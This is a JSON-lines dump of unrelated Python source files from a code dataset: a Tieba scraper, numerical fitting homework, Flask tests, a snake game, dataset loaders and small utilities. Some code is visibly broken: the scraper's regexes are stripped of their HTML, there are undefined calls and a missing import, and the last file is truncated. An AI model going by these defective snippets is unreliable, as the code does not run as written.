self.seeLZ = '?see_lz='\n self.file = None\n self.default_title = \"未命名\"\n # 将要读取的页数\n self.page_index = 1\n # 打印的楼层的层数\n self.content_num = 1\n\n # 页面内容获取\n def get_page(self, question_num, see_lz=1, pn=1):\n try:\n url = self.baseURL + str(question_num) + self.seeLZ + str(see_lz) + '&pn=' + str(pn)\n r = requests.get(url, timeout=3)\n return r.text\n except Exception as e:\n return e\n\n # 获得帖子标题\n def get_Title(self, html):\n pattern = re.compile('''(.*?)''', re.S)\n # re.S。它表示“.”不包含外侧双引号\n result = re.search(pattern, html)\n if result:\n # print(result.group(1)) # 测试输出\n return result.group(1)\n else:\n return None\n\n # 获取帖子一共有多少页\n def getPageNum(self, html):\n pattern = re.compile('
  • .*?(.*?)', re.S)\n result = re.search(pattern, html)\n if result:\n # print(result.group(1)) #测试输出\n # group()用来提出分组截获的字符串,()用来分组\n return int(result.group(1).strip())\n else:\n return None\n\n # 获取每一层楼的内容,传入页面内容\n def getDetail(self, html):\n pattern = re.compile('
    (.*?)
    ', re.S)\n details = re.findall(pattern, html)\n if details:\n str_contents = self.replace(details)\n return str_contents\n return None\n\n # 取出无用信息\n def replace(self, result):\n str_contents = []\n for detail in result:\n item = re.sub('''|
    ''', \"\\n\", detail) # 去图片\n item = re.sub('''|| {4,7}''', \"\", item) # 去链接\n str_contents.append(item.strip())\n # print(str_contents)\n return str_contents\n\n def open_file(self, title):\n if title:\n self.file = open(title + \".txt\", \"w+\", encoding=\"utf-8\")\n else:\n self.file = open(self.default_title + \"w+\", encoding=\"utf-8\")\n\n def write_file(self, str_contents):\n for str_content in str_contents:\n self.file.write(\"楼数:\" + str(self.page_index) + \"-------------------------------\\n\")\n self.file.write(str_content + \"\\n\")\n self.page_index += 1\n\n def start(self, question_num, see_lz=1):\n html = self.get_page(question_num, see_lz, self.page_index)\n title = self.get_Title(html)\n page_num = self.getPageNum(html)\n self.open_file(title)\n # 打印所有页 写入文件\n for i in range(page_num):\n str_contents = self.getDetail(html)\n self.write_file(str_contents)\n self.page_index += 1\n html = self.get_page(question_num, see_lz, self.page_index)\n\n\nif __name__ == \"__main__\":\n # baseUrl = 'http://tieba.baidu.com/p/3138733512'\n # bdtb = BDTB(baseUrl, 1)\n # bdtb.getDetail(bdtb.get_page(1))\n # # bdtb.getPageNum()\n bdtb = BDTB()\n bdtb.start(input('请输入你要查询的帖子代码:'), input('只看楼主? 1真0假'))","sub_path":"爬虫实战/BDTB/bdtb.py","file_name":"bdtb.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"348117561","text":"# Pablo Wiedemann 313510\n# Simon Wiedemann 324020\n\n# SERIES 1\n# EXERCISE 1\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.legend_handler import HandlerLine2D\n\n# a) -----------------------------------------------------------------\ndata = np.loadtxt(\"DispersionCurve.txt\", skiprows = 1) \nk= data[:,0]\nu= data[:,1]\n\n# b) -----------------------------------------------------------------\n\ndef CoeffPol(N,k,u): # returns the coefficients of the \"best fit function\" with polynomial basis \n \n # to solve: A_T*A*alpha=A_T*u\n \n m=len(k) \n A = [[pow(k[i],j) for j in range(N)] for i in range(m)] # Matrix A\n A_T= np.transpose(A)\n \n QR= np.linalg.qr(A) # QR-factorisation of A\n \n Q=QR[0] \n R=QR[1]\n \n Q_T= np.transpose(Q)\n \n b=np.dot(Q_T,u) # Righthand side\n \n alpha = np.zeros(N)\n R_inv=np.linalg.inv(R)\n alpha= np.dot(R_inv,b) # alpha=R_inv * Q_T * u\n \n \n return alpha\n \n# c) -----------------------------------------------------------------\n\ndef CoeffCos(N,k,u): #returns the coefficients of the \"best fit function\" with a basis of cosinus-functions\n m=len(k)\n A = [[np.cos(j*k[i]) for j in range(N)] for i in range(m)] \n A_T= np.transpose(A)\n QR= np.linalg.qr(A)\n \n Q=QR[0]\n R=QR[1]\n \n Q_T= np.transpose(Q)\n \n b=np.dot(Q_T,u) # Righthand side\n \n alpha = np.zeros(N)\n\n R_inv=np.linalg.inv(R)\n alpha= np.dot(R_inv,b) # alpha=R_inv * Q_T * u\n \n return alpha\n \n# d) -----------------------------------------------------------------\n\ndef PolFit(x,a): #returns a vector which contains the values of the polynomial-fit-function on the grid points x \n u = np.zeros(len(x))\n for j in range(len(x)):\n for i in range(len(a)):\n u[j]+=a[i]*pow(x[j],i)\n return u\n\ndef CosFit(x,a): # same as PolFit, but for the cosinus-fit-function\n u = np.zeros(len(x))\n for j in range(len(x)):\n for i in range(len(a)):\n u[j]+=a[i]*np.cos(x[j]*i)\n return u\n \n\n\nx = np.arange(k[0],k[len(k)-1],0.01) # domain-points where we plot the fit-functions \n\nalpha_Pol= CoeffPol(10,k,u) # coefficient vector for the polynomial function\nu_pol= PolFit(x,alpha_Pol) # Polynomial function u_pol which fits u \n\nalpha_Cos= CoeffCos(10,k,u) # coefficients of the function with cos basis\nu_cos= CosFit(x,alpha_Cos) # cos-function which fits u\n\n\n#plot of the functions u, u_pol and u_cos\nplt.figure(1)\nline_u, = plt.plot(k,u,'ro', label='Line 1')\nline_pol, = plt.plot(x,u_pol, label='Line 2')\nline_cos, = plt.plot(x,u_cos, label='Line 3')\nplt.legend([line_u, line_pol,line_cos], ['u', 'u_pol','u_cos'])\nplt.title('least square best fits')\n\nplt.xlabel('Wave vector k')\nplt.ylabel('Frequency w(k)')\nplt.show()\n \n# e) -----------------------------------------------------------------\n\ndef maxRes(N,u,u2): # returns the value of maximal residual \n \n res=np.zeros(len(u))\n \n for i in range(len(u)): \n res[i]= np.absolute(u[i]-u2[i]) #create a vector \"res\" with all the residuals |u-u_fit|\n \n max_res= np.amax(np.absolute(res)) #function \"amax\" returns the bigest entry of an array \n \n return max_res\n\n# Now for N =1,2,...,10 :\nresMaxVector_pol= np.zeros(10)\nresMaxVector_cos= np.zeros(10)\n\nfor N in np.arange(1,11,1): # For each N calculate the fit-functions and the max residual \n \n alpha_Pol= CoeffPol(N,k,u) \n u_pol= PolFit(k,alpha_Pol) \n resMaxVector_pol[N-1]=maxRes(N,u,u_pol) # becomes a vector with all the max|u-u_pol| for each N\n \n alpha_Cos= CoeffCos(N,k,u) \n u_cos= CosFit(k,alpha_Cos)\n resMaxVector_cos[N-1]=maxRes(N,u,u_cos) # becomes a vector with all the max|u-u_cos| for each N\n\n\n# plot of the max_res of the functions u_plot and u_cos\nplt.figure(2)\nres_pol, = plt.plot(np.arange(1,11,1),resMaxVector_pol,label='Line 1')\nres_cos, = plt.plot(np.arange(1,11,1),resMaxVector_cos, label='Line 2')\nplt.legend([res_pol,res_cos], ['max.res_pol','max.res_cos'])\nplt.title('maximal residuals')\n\nplt.xlabel('Basis order N')\nplt.ylabel('Maximal residuals')\nplt.show()\n\n# f) -----------------------------------------------------------------\n# See pdf-file\n","sub_path":"1Hw/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"439778499","text":"\"\"\"Using pytest\"\"\"\n\nfrom flask_restful import Api, Resource\nfrom flask import jsonify\nimport json\nfrom app import app\n\ntest_client = app.test_client()\n\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.realpath(__file__)) + \"/../src\")\n\nfrom membrane import parser\n\n\ndef test_basic_membrane():\n \"\"\"Test Flask\"\"\"\n\n @app.route(\"/test_basic_membrane\")\n @parser({\"val0\": int})\n def test_basic_membrane(*args):\n return jsonify(args)\n\n res = test_client.get(\"/test_basic_membrane?limit=0&val0=0\").json\n assert res[0][\"val0\"] == 0\n\n\ndef test_multi_layer_membrane():\n \"\"\"Test Flask\"\"\"\n\n @app.route(\"/test_multi_layer_membrane\")\n @parser({\"val0\": int, \"val1\": int}, {\"val2\": int})\n def test_multi_layer_membrane(*args):\n return jsonify(args)\n\n res = test_client.get(\n \"/test_multi_layer_membrane?val0=0&val1=1&val2=2\"\n ).json\n assert res[0][\"val0\"] == 0\n assert res[0][\"val1\"] == 1\n assert res[1][\"val2\"] == 2\n\n\ndef test_membrane2():\n \"\"\"Test Flask-RESTful\"\"\"\n\n class Root(Resource):\n @parser({\"limit\": int})\n def get(self, *args):\n return args, 200\n\n api = Api(app)\n api.add_resource(Root, \"/test_membrane2\")\n\n res = test_client.get(\"/test_membrane2?limit=0\").json\n assert res[0][\"limit\"] == 0\n\n\nif __name__ == \"__main__\":\n test_membrane()\n test_membrane2()\n","sub_path":"tests/test_all.py","file_name":"test_all.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"527690894","text":"import boto3\n\nclient = boto3.client('dynamodb')\nresponse = client.put_item(\n TableName='Students',\n Item={\n 'id': {'S':'127'},\n 'name': {'S':'Rohit'},\n 'age': {'N':'35'},\n 'isMale': {'BOOL':True},\n 'course':{'S':'HitMan'}\n })\nprint(response)\n","sub_path":"DynamoDB/PutDDBUsingClient.py","file_name":"PutDDBUsingClient.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"181305904","text":"# Written by Till Hoffmann\n# (http://stackoverflow.com/questions/18228966/how-can-matplotlib-2d-patches-be-transformed-to-3d-with-arbitrary-normals)\n#\n\nfrom mpl_toolkits.mplot3d import art3d\n\ndef rotation_matrix(d):\n \"\"\"\n Calculates a rotation matrix given a vector d. The direction of d\n corresponds to the rotation axis. The length of d corresponds to \n the sin of the angle of rotation.\n\n Variant of: http://mail.scipy.org/pipermail/numpy-discussion/2009-March/040806.html\n \"\"\"\n sin_angle = np.linalg.norm(d)\n\n if sin_angle == 0:\n return np.identity(3)\n\n d /= sin_angle\n\n eye = np.eye(3)\n ddt = np.outer(d, d)\n skew = np.array([[ 0, d[2], -d[1]],\n [-d[2], 0, d[0]],\n [d[1], -d[0], 0]], dtype=np.float64)\n\n M = ddt + np.sqrt(1 - sin_angle**2) * (eye - ddt) + sin_angle * skew\n return M\n\ndef pathpatch_2d_to_3d(pathpatch, z = 0, normal = 'z'):\n \"\"\"\n Transforms a 2D Patch to a 3D patch using the given normal vector.\n\n The patch is projected into they XY plane, rotated about the origin\n and finally translated by z.\n \"\"\"\n if type(normal) is str: #Translate strings to normal vectors\n index = \"xyz\".index(normal)\n normal = np.roll((1.0,0,0), index)\n\n normal /= np.linalg.norm(normal) #Make sure the vector is normalised\n\n path = pathpatch.get_path() #Get the path and the associated transform\n trans = pathpatch.get_patch_transform()\n\n path = trans.transform_path(path) #Apply the transform\n\n pathpatch.__class__ = art3d.PathPatch3D #Change the class\n pathpatch._code3d = path.codes #Copy the codes\n pathpatch._facecolor3d = pathpatch.get_facecolor #Get the face color \n\n verts = path.vertices #Get the vertices in 2D\n\n d = np.cross(normal, (0, 0, 1)) #Obtain the rotation vector \n M = rotation_matrix(d) #Get the rotation matrix\n\n pathpatch._segment3d = np.array([np.dot(M, (x, y, 0)) + (0, 0, z) for x, y in verts])\n\ndef pathpatch_translate(pathpatch, delta):\n \"\"\"\n Translates the 3D pathpatch by the amount delta.\n \"\"\"\n pathpatch._segment3d += delta\n","sub_path":"pyram/draw/draw_patch_3d.py","file_name":"draw_patch_3d.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"614576118","text":"print(\"Input model of RNA: AUGGUCUACAUAGCUGACAAACAGCACGUAGCAAUCGGUCGAAUCUCGAGAGGCAUAUGGUCACAUGAUCGGUCGAGCGUGUUUCAAAGUUUGCGCCUAG\")\nrna = input(\"Enter the RNA: \")\nprint(\"Input model of introns: AUCGGUCGAA,AUCGGUCGAGCGUGU\")\nintrons = input(\"Enter the introns: \")\nlist_introns = introns.split(',')\n\nfor i in list_introns:\n if i in rna:\n rna = rna.replace(i, '')\n\nprint(\"Mature transcript (mRNA):\", rna)\n","sub_path":"splicing.py","file_name":"splicing.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"59921257","text":"import copy\nimport numpy as np\n\nfrom chainer import reporter\nimport chainer.training.extensions\n\nfrom chainercv.evaluations import eval_instance_segmentation_voc\nfrom chainercv.utils import apply_to_iterator\n\n\nclass InstanceSegmentationVOCEvaluator(chainer.training.extensions.Evaluator):\n\n \"\"\"An evaluation extension of instance-segmentation by PASCAL VOC metric.\n\n This extension iterates over an iterator and evaluates the prediction\n results by average precisions (APs) and mean of them\n (mean Average Precision, mAP).\n This extension reports the following values with keys.\n Please note that :obj:`'ap/'` is reported only if\n :obj:`label_names` is specified.\n\n * :obj:`'map'`: Mean of average precisions (mAP).\n * :obj:`'ap/'`: Average precision for class \\\n :obj:`label_names[l]`, where :math:`l` is the index of the class. \\\n For example, this evaluator reports :obj:`'ap/aeroplane'`, \\\n :obj:`'ap/bicycle'`, etc. if :obj:`label_names` is \\\n :obj:`~chainercv.datasets.sbd_instance_segmentation_label_names`. \\\n If there is no bounding box assigned to class :obj:`label_names[l]` \\\n in either ground truth or prediction, it reports :obj:`numpy.nan` as \\\n its average precision. \\\n In this case, mAP is computed without this class.\n\n Args:\n iterator (chainer.Iterator): An iterator. Each sample should be\n following tuple :obj:`img, bbox, label` or\n :obj:`img, bbox, label, difficult`.\n :obj:`img` is an image, :obj:`bbox` is coordinates of bounding\n boxes, :obj:`label` is labels of the bounding boxes and\n :obj:`difficult` is whether the bounding boxes are difficult or\n not. If :obj:`difficult` is returned, difficult ground truth\n will be ignored from evaluation.\n target (chainer.Link): An instance-segmentation link. This link must\n have :meth:`predict` method that takes a list of images and returns\n :obj:`bboxes`, :obj:`labels` and :obj:`scores`.\n iou_thresh (float): Intersection over Union (IoU) threshold for\n calulating average precision. The default value is 0.5.\n use_07_metric (bool): Whether to use PASCAL VOC 2007 evaluation metric\n for calculating average precision. The default value is\n :obj:`False`.\n label_names (iterable of strings): An iterable of names of classes.\n If this value is specified, average precision for each class is\n also reported with the key :obj:`'ap/'`.\n \"\"\"\n\n trigger = 1, 'epoch'\n default_name = 'validation'\n priority = chainer.training.PRIORITY_WRITER\n\n def __init__(\n self, iterator, target,\n iou_thresh=0.5, use_07_metric=False, label_names=None\n ):\n super().__init__(iterator, target)\n self.iou_thresh = iou_thresh\n self.use_07_metric = use_07_metric\n self.label_names = label_names\n\n def evaluate(self):\n iterator = self._iterators['main']\n target = self._targets['main']\n\n if hasattr(iterator, 'reset'):\n iterator.reset()\n it = iterator\n else:\n it = copy.copy(iterator)\n\n in_values, out_values, rest_values = apply_to_iterator(\n target.predict, it)\n # delete unused iterators explicitly\n del in_values\n\n pred_masks, pred_labels, pred_scores = out_values\n gt_masks, gt_labels = rest_values\n\n result = eval_instance_segmentation_voc(\n pred_masks, pred_labels, pred_scores,\n gt_masks, gt_labels,\n iou_thresh=self.iou_thresh,\n use_07_metric=self.use_07_metric)\n\n report = {'map': result['map']}\n\n if self.label_names is not None:\n for l, label_name in enumerate(self.label_names):\n try:\n report['ap/{:s}'.format(label_name)] = result['ap'][l]\n except IndexError:\n report['ap/{:s}'.format(label_name)] = np.nan\n\n observation = {}\n with reporter.report_scope(observation):\n reporter.report(report, target)\n return observation\n","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"351601533","text":"#!/usr/bin/python\r\n\r\nimport time\r\n\r\nfilename = input(\"Вкажіть назву файлу: \")\r\nGraph = open(filename, \"r\")\r\n\r\nnm = Graph.readline().split()\r\n\r\ndef get_mass(file):\r\n data = []\r\n m = int(nm[1])\r\n while m > 0:\r\n m -= 1\r\n data.append(file.readline().split())\r\n return data\r\n\r\ndata = get_mass(Graph)\r\n\r\ndef incedent(file):\r\n incedent_matrix = []\r\n for edge in range(int(nm[0])):\r\n edges = []\r\n for j in range(int(nm[1])):\r\n if edge + 1 == int(file[j][0]) == int(file[j][1]):\r\n edges.append(2)\r\n elif edge + 1 == int(file[j][0]):\r\n edges.append(-1)\r\n elif edge + 1 == int(file[j][1]):\r\n edges.append(1)\r\n else:\r\n edges.append(0)\r\n incedent_matrix.append(edges)\r\n return incedent_matrix\r\n\r\ndef symizh(file):\r\n symizh_matrix = [[0 for i in range(int(nm[0]))] for j in range(int(nm[0]))]\r\n for i in range(int(nm[1])):\r\n k = int(file[i][0])\r\n l = int(file[i][1])\r\n symizh_matrix[k-1][l-1] = 1\r\n return symizh_matrix\r\n\r\ndef print_matrix(m):\r\n edge = int(1)\r\n for i in m:\r\n print('{0:3d}'.format(edge), end=\" \")\r\n for j in i:\r\n print('{0:2d}'.format(j), end=\" \")\r\n edge=int(edge)+1\r\n print()\r\n\r\ndef write_to_file(matrix, mode):\r\n with open(\"Result.txt\", mode) as Result:\r\n for i in matrix:\r\n Result.write(str(i))\r\n Result.write(\"\\n\")\r\n\r\n\r\n\r\nif __name__ == \"__main__\": \r\n\r\n print(nm)\r\n answer = input(\"Перевести в iнцидентну матрицю? [y/n] \")\r\n\r\n flag = False\r\n\r\n if answer == 'y':\r\n flag = True\r\n write_to_file(incedent(data), \"w\")\r\n print(\" \", end=\" \")\r\n for i in range(int(nm[1])):\r\n print('{0:2d}'.format(i+1), end=\" \")\r\n print()\r\n print_matrix(incedent(data))\r\n\r\n answer = input(\"Перевести в матрицю сумiжностi? [y/n] \")\r\n\r\n if answer == 'y':\r\n if flag:\r\n mode=\"a\"\r\n else: mode=\"w\"\r\n write_to_file(symizh(data), mode)\r\n print(\" \", end=\" \")\r\n for i in range(int(nm[0])):\r\n print('{0:2d}'.format(i+1), end=\" \")\r\n print()\r\n print_matrix(symizh(data))\r\n time.sleep(5)\r\n\r\nGraph.close()\r\n","sub_path":"src/test/resources/testset-UKR/47/47.py","file_name":"47.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"372209993","text":"import numpy as np\nimport pickle\nfrom multiprocessing import Pool\n\nfrom sklearn.svm import SVC, SVR\n\n\nENSEMBLE_FILE_PATH = '/Users/david/ColumbiaCS/bda/project/final-website/python/Classifiers/ensemble.pkl'\n\n\nclass EnsembleSVC(object):\n def __init__(self, numSvr, pcaCount=None, kernel='rbf', C=10, gamma=0.1, degree=2):\n self.numSvr = numSvr\n self.kernel = kernel\n self.C = C\n self.gamma = gamma\n self.degree = degree\n self.svrList = [SVR(kernel=kernel, C=C, degree=degree, gamma=gamma) for x in range(numSvr)]\n self.svc = SVC(kernel='poly', C=C, degree=degree, gamma=gamma)\n self.pca = PCA(n_components=pcaCount) if pcaCount else None\n\n def trainSVR(self, svr, X, y):\n svr.fit(X, y)\n return svr\n\n def predictSVR(self, svr, X):\n return svr.predict(X)\n\n def fit(self, X_train, y_train, n_jobs=8):\n p = Pool(n_jobs)\n dataSplitX = np.array_split(X_train, self.numSvr + 1)\n dataSplitY = np.array_split(y_train, self.numSvr + 1)\n trainingListX = dataSplitX[:-1]\n trainingListY = dataSplitY[:-1]\n validationX = dataSplitX[-1]\n validationY = dataSplitY[-1]\n self.svrList = p.starmap(self.trainSVR, zip(self.svrList, trainingListX, trainingListY))\n\n predList = p.starmap(self.predictSVR, zip(self.svrList, [validationX for idx in range(self.numSvr)]))\n svrFeatures = np.stack(predList, axis=1)\n pcaFeatures = self.pca.fit_transform(svrFeatures) if self.pca else svrFeatures\n self.svc.fit(pcaFeatures, validationY)\n\n def predict(self, X, n_jobs=8):\n p = Pool(n_jobs)\n predList = p.starmap(self.predictSVR, zip(self.svrList, [X for idx in range(self.numSvr)]))\n svrFeatures = np.stack(predList, axis=1)\n pcaFeatures = self.pca.transform(svrFeatures) if self.pca else svrFeatures\n return self.svc.predict(pcaFeatures)\n\n\ndef loadEnsembleSVC():\n with open(ENSEMBLE_FILE_PATH, 'rb') as file:\n return pickle.load(file)","sub_path":"python/Classifiers/EnsembleClassifier.py","file_name":"EnsembleClassifier.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"624931374","text":"from tkinter import *\nimport time\nimport queue\nimport threading\nimport random\n\nclass World(Tk):\n '''\n 用来模拟整个游戏画板\n '''\n def __init__(self,queue):\n Tk.__init__(self)\n self.queue=queue\n self.is_game_over=False\n # 定义画板\n self.canvas = Canvas(self, width=495, height=305, bg='black')\n self.canvas.pack()\n # 画出蛇和食物\n self.snake = self.canvas.create_line((0, 0), (0, 0), fill=\"yellow\", width=10)\n self.food = self.canvas.create_rectangle(0, 0, 0, 0, fill='#FFCC4C', outline='#FFCC4C')\n self.points_earned = self.canvas.create_text(455, 15, fill='white', text='SCORE: 0')\n self.queue_handler()\n\n def queue_handler(self):\n try:\n # 需要不断从消息队列拿到消息,所以使用死循环\n while True:\n # 非阻塞队列\n task = self.queue.get(block=False)\n if task.get(\"game_over\"):\n self.game_over()\n if task.get(\"move\"):\n points = [x for point in task['move'] for x in point]\n # 重新绘制蛇\n self.canvas.coords(self.snake, *points)\n # 同样道理,还需要处理食物,得分\n if task.get(\"food\"):\n self.canvas.coords(self.food,*task['food'])\n elif task.get('points_earned'):\n self.canvas.itemconfigure(self.points_earned,\n text='score:{}'.format(task['points_earned']))\n self.queue.task_done() #task_done\n\n except queue.Empty: # 爆出队列为空异常\n # 游戏没结束时 在100ms后调用queue_handler函数\n if not self.is_game_over:\n # after的含义是,在多少毫秒后调用后面的函数\n self.canvas.after(100, self.queue_handler)\n\n def game_over(self):\n '''\n 游戏结束,清理现场\n '''\n self.is_game_over = True\n self.canvas.create_text(200,150,fill='white',text=\"Game Over\")\n quitbtn= Button(self, text=\"Quit\",command=self.destroy)\n rebtn = Button(self, text=\"Again\", command=self.__init__)\n self.canvas.create_window(200,180,anchor='nw',window=quitbtn)\n self.canvas.create_window(240,180, anchor='nw', window=rebtn)\n\nclass Food():\n '''\n 功能:\n 1. 出现在画面的某一个地方\n 2. 一旦被吃,则增加蛇的分数\n '''\n def __init__(self,queue):\n '''\n 自动产生一个食物\n '''\n self.queue = queue\n self.new_food()\n def new_food(self):\n '''\n 功能:产生一个食物\n 产生一个食物的过程就是随机产生一个食物坐标的过程\n '''\n # 注意横纵坐标产生的范围\n x = random.randrange(5,480,10)\n # 同理产生y坐标\n y = random.randrange(5,295,10)\n # 需要注意的是,我们的正给游戏屏幕一般不需要把他设置成正方形\n self.position = x, y # position存放食物的位置\n # 队列,就是一个不能够随意访问内部元素,只能从头弹出一个元素并只能从队尾追加元素的list\n # 把一个食物产生的消息放入队列\n # 消息的格式,自己定义\n # 我的定义是: 消息是一个dict, k代表消息类型,v代表此类型的数据\n self.exppos=x-5,y-5,x+5,y+5\n self.queue.put({\"food\": self.exppos})\n\n\nclass Snake(threading.Thread):\n '''\n 蛇的功能:\n 1. 蛇能动,由我们的上下左右按键控制\n 2. 蛇每次动,都需要重新计算蛇头的位置\n 3. 检测是否游戏完事的功能\n '''\n\n def __init__(self, world, queue):\n threading.Thread.__init__(self)\n self.world = world\n self.queue=queue\n self.daemon=True #守护线程,当主进程结束时,线程自动结束\n self.points_earned = 0 # 游戏分数\n self.food = Food(queue)\n self.direction='Left'\n self.snake_points = [(495, 55), (485, 55),(475, 55), (465, 55), (455, 55)]\n self.start()\n\n def run(self):\n '''\n 一旦启用多线程就需要调用此函数\n 要求蛇一直都在跑\n '''\n if self.world.is_game_over:\n self._delete()\n\n while not self.world.is_game_over:\n self.queue.put({\"move\": self.snake_points})\n time.sleep(0.2) # 控制蛇的速度\n self.move()\n\n def key_pressed(self, e):\n # keysym是按键名称\n self.direction = e.keysym\n\n def move(self):\n '''\n 负责蛇的移动\n 1. 重新计算蛇头的坐标\n 2. 当蛇头跟食物相遇,则加分,重新生成食物,通知world,加分\n 3. 否则, 蛇需要动\n '''\n new_snake_point = self.cal_new_position() # 重新计算蛇头位置\n\n # 蛇头位置跟食物位置相同\n if self.food.position == new_snake_point:\n self.points_earned += 1 # 得分加1\n self.queue.put({\"points_earned\": self.points_earned})\n self.food.new_food() # 就得食物被吃掉,产生新的食物\n else:\n # 需要注意蛇的信息的保存方式\n # 每次移动是删除存放蛇的最前位置,并在后面追加\n self.snake_points.pop(0)\n # 判断程序是否退出,因为新的蛇可能撞墙\n self.check_game_over(new_snake_point)\n self.snake_points.append(new_snake_point)\n\n def cal_new_position(self):\n '''\n 计算新的 蛇头的位置\n '''\n last_x, last_y = self.snake_points[-1]\n if self.direction == \"Up\": # direction负责存储蛇移动的方向\n new_snake_point = last_x, last_y - 10 # 每次移动的跨度是10像素\n elif self.direction == 'Down':\n new_snake_point = last_x, last_y + 10\n elif self.direction == 'Left':\n new_snake_point = last_x-10, last_y\n elif self.direction == 'Right':\n new_snake_point = last_x+10, last_y\n return new_snake_point\n\n def check_game_over(self, snake_point):\n '''\n 判断的依据是蛇头是否和墙相撞\n '''\n # 把蛇头的坐标拿出来,跟墙的坐标进行判断\n x, y = snake_point[0], snake_point[1]\n if not -5 < x < 505 or not -5 < y < 315 or snake_point in self.snake_points:\n self.queue.put({'game_over': True})\n\nif __name__ == \"__main__\":\n # 实例queue模块中的Queue类,先进先出\n global q, world\n q=queue.Queue()\n world = World(q)\n snake = Snake(world, q)\n # 绑定上下左右键\n world.bind('', snake.key_pressed)\n world.bind('', snake.key_pressed)\n world.bind('', snake.key_pressed)\n world.bind('', snake.key_pressed)\n world.mainloop()\n","sub_path":"编程实战/Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"233152136","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\nimport keras\nfrom keras.utils import to_categorical\nfrom keras.datasets import fashion_mnist\n\nclass DocDataset:\n def __init__(self):\n print(\"class create\")\n\n def load_train_data(self):\n (x_train, y_train), _ = fashion_mnist.load_data()\n x_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\n x_train = x_train.astype('float32') / 255\n\n x_train_s, x_train_ref, y_train_ref = [], [], []\n\n for i in range(len(x_train)):\n \n # スニーカーxデータ\n if (y_train[i] == 7):\n x_train_s.append(x_train[i])\n # スニーカーデータ以外\n else:\n x_train_ref.append(x_train[i])\n y_train_ref.append(y_train[i])\n \n x_train_ref = np.array(x_train_ref)\n x_train_snicor = np.array(x_train_s)\n\n randon_seed = np.random.choice(np.arange(0, len(x_train_ref)), 6000, replace=False)\n x_train_ref = [x_train_ref[i] for i in randon_seed]\n y_train_ref = [y_train_ref[i] for i in randon_seed]\n\n # レファレンスネットワークのデータ。スニーカー以外のデータセット\n x_train_ref = np.array(x_train_ref)\n y_train_ref = to_categorical(y_train_ref)\n\n print(\"resizing snicor images ...\")\n x_train_snicor = self.resize(x_train_snicor)\n print(\"resizing references images ...\")\n x_train_ref = self.resize(x_train_ref)\n y_train_ref = y_train_ref\n\n return x_train_snicor, x_train_ref, y_train_ref\n\n def load_test_data(self):\n _, (x_test, y_test) = fashion_mnist.load_data()\n x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\n x_test = x_test.astype('float32') / 255\n x_test_s, x_test_b = [], []\n\n for i in range(len(x_test)):\n # スニーカーのテストデータ\n if y_test[i] == 7:\n x_test_s.append(x_test[i].reshape((x_test.shape[1:])))\n # ブーツのデータセット\n if y_test[i] == 9:\n x_test_b.append(x_test[i].reshape((x_test.shape[1:])))\n\n x_test_snicer = np.array(x_test_s)\n x_test_boot = np.array(x_test_b)\n\n x_test_snicer = self.resize(x_test_snicer)\n x_test_boot = self.resize(x_test_boot)\n\n return x_test_snicer, x_test_boot\n \n def resize(self, x):\n x_out = []\n\n for i in range(len(x)):\n img = cv2.cvtColor(x[i], cv2.COLOR_GRAY2RGB)\n img = cv2.resize(img,dsize=(224, 224))\n x_out.append(img)\n\n return np.array(x_out)","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"645602960","text":"class base():\n def __init__(self):\n self.type = \"\"\n self.speed = 0\n def swim_result(self, distance):\n print(\"Время преодоления дистанции \", self.type, \" = \", distance/self.speed)\n\nclass Shark(base):\n def __init__(self):\n self.type = \"Shark\"\n self.speed = 3\n\nclass Human(base):\n def __init__(self):\n self.type = \"Human\"\n self.speed = 1\n\nclass Boat(base):\n def __init__(self):\n self.type = \"Boat\"\n self.speed = 10\n\nclass Factory():\n def build(typ):\n if typ == \"Shark\":\n return Shark()\n elif typ == \"Human\":\n return Human()\n elif typ == \"Boat\":\n return Boat()\n\ns = Factory.build(\"Shark\")\nh = Factory.build(\"Human\")\nb = Factory.build(\"Boat\")\n\ns.swim_result(100)\nh.swim_result(100)\nb.swim_result(100)\n\n\n\n ","sub_path":"Factory.py","file_name":"Factory.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128702768","text":"class Text(str):\n\n def __str__(self):\n exchange = super().__str__().replace('>', '>').replace('<', '<')\n if exchange == '\"':\n exchange = exchange.replace('\"', '"')\n return exchange.replace('\\n', '\\n
